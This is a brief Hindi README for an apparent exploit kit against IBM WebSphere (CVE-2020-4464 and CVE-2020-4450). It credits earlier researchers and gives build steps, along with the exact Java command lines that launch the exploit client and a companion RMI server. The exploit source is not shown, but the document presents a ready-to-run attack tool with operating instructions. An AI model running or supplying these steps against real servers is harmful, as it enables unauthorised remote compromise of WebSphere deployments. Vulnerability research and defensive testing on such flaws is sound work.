
CVE-2020-4464 / CVE-2020-4450
यह ZDI के उत्कृष्ट ब्लॉग पोस्ट पर आधारित है (मूल रिपोर्ट @_tint0 द्वारा):
... और कुछ अच्छे चीनी हैकर्स के काम पर (मैं कोड का वास्तविक स्रोत निर्धारित नहीं कर सका, यदि आपको लगता है कि आप क्रेडिट के हकदार हैं तो एक Issue खोलने में संकोच न करें):
मेरे अतिरिक्त (वास्तव में ज्यादा नहीं):
FoxGlove का कोड को एक सबमॉड्यूल के रूप में शामिल किया गया है, आप CVE-2020-4464 को ट्रिगर करने के लिए WebSphere अनुरोध फ़ाइल का उपयोग कर सकते हैं।
आपको plugins और runtimes निर्देशिकाओं को WebSphere से lib निर्देशिका में कॉपी करना चाहिए, फिर संकलित करने के लिए ant चलाएँ!
चलाने के लिए (Java 11):
java -cp .:runtimes/com.ibm.ws.orb_9.0.jar:runtimes/com.ibm.ws.admin.client_9.0.jar:plugins/com.ibm.ws.managedobject.jar:plugins/com.ibm.ws.runtime.jar:plugins/com.ibm.ws.batch.runtime.jar:plugins/javax.j2ee.ejb.jar:runtimes/com.ibm.jaxws.thinclient_9.0.jar --add-modules jdk.naming.rmi --add-exports='jdk.naming.rmi/com.sun.jndi.rmi.registry=ALL-UNNAMED' Test
java -cp .:plugins/com.ibm.ws.runtime.jar:runtimes/com.ibm.ws.admin.client_9.0.jar RMIServer